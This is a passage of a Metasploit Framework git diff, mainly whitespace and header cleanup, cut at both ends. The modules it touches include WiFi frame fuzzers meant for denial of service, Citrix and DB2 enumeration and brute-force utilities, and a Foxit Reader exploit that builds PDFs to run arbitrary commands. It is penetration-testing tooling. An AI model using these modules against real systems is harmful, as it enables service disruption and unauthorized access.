0x55, 0x00, 0x00, + 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, + 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, + 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, + 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, + 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, + 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, + 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, + 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, + 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, + 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, + 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, + 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, + 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, + 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, + 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, + 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x00, 0x00, 0x00, 0x0f, 
0x73, 0x73, 0x68, 0x2d, + 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, + 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, + 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, + 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, + 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, + 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, + 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, + 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, + 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, + 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, + 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, + 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, + 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, + 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, + 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, + 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, + 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, + 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, + 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, + 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, + 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, + 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, + 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, + 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, + 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, + 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, + 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, + 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, + 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, + 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, + 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, + 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, + 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, + 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, + 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, + 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, + 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, + 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, + 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, + 0x61, 0x65, 0x73, 0x31, 
0x39, 0x32, 0x2d, 0x63, + 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, + 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, + 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, + 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, + 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, + 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, + 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, + 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, + 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, + 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, + 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, + 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, + 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, + 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, + 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, + 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, + 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, + 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, + 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, + 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, + 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, + 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, + 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, + 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, + 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, + 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, + 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, + 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, + 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, + 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, + 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, + 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, + 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*") end end 
diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index 7eb90a9742..ef9695759e 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Beacon Frame Fuzzer', 'Description' => %q{ This module sends out corrupted beacon frames. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) + ], self.class) end def ping_check @@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary end return false end - + def run - + srand(0) - + @@uni = 0 - + frames = [] - + open_wifi - + print_status("Sending corrupt frames...") - + while (true) frame = create_frame() - + if (datastore['PING_HOST']) - + if (frames.length >= 5) frames.shift frames.push(frame) @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary frames.push(frame) end - 1.upto(3) do + 1.upto(3) do wifi.write(frame) if (not ping_check()) frames.each do |f| @@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary print_status f.inspect end return - end + end end - else + else wifi.write(frame) end end 
@@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary ssid = Rex::Text.rand_text_alphanumeric(rand(256)) bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval #"\x00\x05" + # capability flags - Rex::Text.rand_text(2) + - + Rex::Text.rand_text(2) + + # ssid tag "\x00" + ssid.length.chr + ssid + @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end - + return frame end - + end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb index 9ba9f2cba2..367dcdd9c6 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Probe Response Frame Fuzzer', 'Description' => %q{ This module sends out corrupted probe response frames. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' 
@@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) + OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) + ], self.class) end def ping_check @@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary end return false end - + def run - + srand(0) - + @@uni = 0 - + frames = [] - + open_wifi - + print_status("Sending corrupt frames...") - + while (true) frame = create_frame() - + if (datastore['PING_HOST']) - + if (frames.length >= 5) frames.shift frames.push(frame) @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary frames.push(frame) end - 1.upto(10) do + 1.upto(10) do wifi.write(frame) if (not ping_check()) frames.each do |f| @@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary print_status f.inspect end return - end + end end - else + else wifi.write(frame) end end @@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) # capability flags - + ssid = Rex::Text.rand_text_alphanumeric(rand(256)) # ssid tag frame << "\x00" + ssid.length.chr + ssid # supported rates - frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" - + frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel frame << "\x03" + "\x01" + channel.chr - + 1.upto(ies) do |i| max = mtu - frame.length break if max < 2 @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end - + return frame end - + end 
diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index d410d09fb1..6b5edb98f8 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], ] )) @@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary def run connect_udp - + print_status("Attempting to contact Citrix ICA service...") client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" udp_sock.put(client_connect) res = udp_sock.get(3) - + if (res[0,server_response.length] == server_response) print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...") diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 7cf143860e..a9b73b6eef 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'OSVDB', '50617' ], [ 'BID', '5817' ], [ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ], @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary def run connect_udp - + print_status("Attempting to contact Citrix ICA service...") client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:) @@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published - + udp_sock.put(client_connect) res = udp_sock.get(3) - + if (res[0,server_response.length] == server_response) print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.") @@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00" packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00" packet << client + "\x00" - + udp_sock.put(packet) res = udp_sock.get(3) - + if (res[0,application_valid.length] == application_valid) print_status("Found: #{application}") end - + if (res[0,application_invalid.length] == application_invalid) print_error("NOT Found: #{application}") end end - + else print_error("Server did not respond.") end diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index d2b3f44364..fc53c07ae3 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb 
@@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' @@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Foxit Reader Authorization Bypass', 'Description' => %q{ This module exploits a authorization bypass vulnerability in Foxit Reader - build 1120. When a attacker creates a specially crafted pdf file containing - a Open/Execute action, arbitrary commands can be executed without confirmation - from the victim. + build 1120. When a attacker creates a specially crafted pdf file containing + a Open/Execute action, arbitrary commands can be executed without confirmation + from the victim. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC', 'Didier Stevens ', ], + 'Author' => [ 'MC', 'Didier Stevens ', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-0836' ], [ 'BID', '34035' ], 
@@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary 'DisclosureDate' => 'Mar 9 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) + register_options( + [ + OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']), + OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), + ], self.class) end @@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary # Create the pdf pdf = make_pdf(exec) - print_status("Creating '#{datastore['FILENAME']}' file...") + print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end @@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary end result end - + def ioDef(id) "%d 0 obj" % id end @@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary def ioRef(id) "%d 0 R" % id end - + def make_pdf(exec) xref = [] eol = "\x0d\x0a" endobj = "endobj" << eol - + # Randomize PDF version? pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol pdf << "%" << RandomNonASCIIString(4) << eol diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index add4373171..1a50b23e56 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -14,12 +14,12 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['todb'], 'License' => MSF_LICENSE ) - + register_options( [ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) - + end def run_host(ip) @@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary begin info = db2_check_login rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} : Unable to attempt authentication") + vprint_error("#{rhost}:#{rport} : Unable to attempt authentication") return :abort rescue ::Rex::Proto::DRDA::RespError => e - vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") + vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") return :abort end disconnect diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 58ff1376cc..16754fc457 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DB2 Probe Utility', @@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) verbose = datastore['VERBOSE'] begin - + info = db2_probe(2) if info[:excsatrd] inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth] report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}" print_status("#{ip}:#{rport} DB2 - #{report_info}") report_service( - :host => rhost, + :host => rhost, :port => rport, :name => "db2", :info => report_info ) end disconnect - + rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose + print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose return :done rescue ::Rex::Proto::DRDA::RespError => e - print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose + print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose return :error end end diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 95215859ce..7d021f38a7 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -8,11 +12,11 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp - + def initialize super( 'Name' => 'DB2 Discovery Service Detection.', @@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'MC' ], 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(523),], self.class) deregister_options('RHOST') end def run_host(ip) - + pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00" begin @@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary connect_udp udp_sock.put(pkt) - + res = udp_sock.read(1024).split(/\x00/) - + if (res) report_note( :host => ip, @@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE + rescue ::Errno::EPIPE end end diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 57831457c2..7538c764a4 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Hidden DCERPC Service Discovery', 
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of - these services and use the management API to list all other + these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted. @@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RHOST', 'RPORT') end # Obtain information about a single host - def run_host(ip) + def run_host(ip) begin epm = dcerpc_endpoint_list() @@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary print_status("Could not contact the endpoint mapper on #{ip}") return end - + eports = {} - + epm.each do |ep| next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp") eports[ep[:port]] ||= {} eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true end - + eports.each_pair do |eport, servs| - + rport = eport print_status("Looking for services on #{ip}:#{rport}...") - + ids = dcerpc_mgmt_inq_if_ids(rport) return if not ids - + ids.each do |id| if (not servs.has_key?(id[0]+'_'+id[1])) print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}") - + conn = nil bind = nil call = nil 
@@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary res = dcerpc.call(0, NDR.long(0) * 128) call = true - + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) data = dcerpc.last_response.stub_data end - + rescue ::Interrupt raise $! rescue ::Exception => e error = e.to_s end - + if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/) call = true end - + status = "\t\t" status << "CONN " if conn status << "BIND " if bind status << "CALL " if call status << "DATA=#{data.unpack("H*")[0]} " if data status << "ERROR=#{error} " if error - + print_status(status) print_status("") - + end end end - + rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error: #{e}") end end - + end diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index f2d9f6838e..fe28accc56 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Remote Management Interface Discovery', 'Version' => '$Revision$', 'Description' => %q{ - This module can be used to obtain information from the Remote + This module can be used to obtain information from the Remote Management Interface DCERPC service. }, 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RHOST') - + register_options( [ Opt::RPORT(135) - ], self.class) + ], self.class) end # Obtain information about a single host - def run_host(ip) + def run_host(ip) begin ids = dcerpc_mgmt_inq_if_ids(rport) return if not ids ids.each do |id| print_status("UUID #{id[0]} v#{id[1]}") - + stats = dcerpc_mgmt_inq_if_stats(rport) print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats - + live = dcerpc_mgmt_is_server_listening(rport) print_status("\t listening: %.8x" % live) if live @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary princ = dcerpc_mgmt_inq_princ_name(rport) print_status("\t name: #{princ.unpack("H*")[0]}") if princ - + end - + rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error: #{e}") end end - + end \ No newline at end of file diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index de5c0ac771..8639e5cc46 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb 
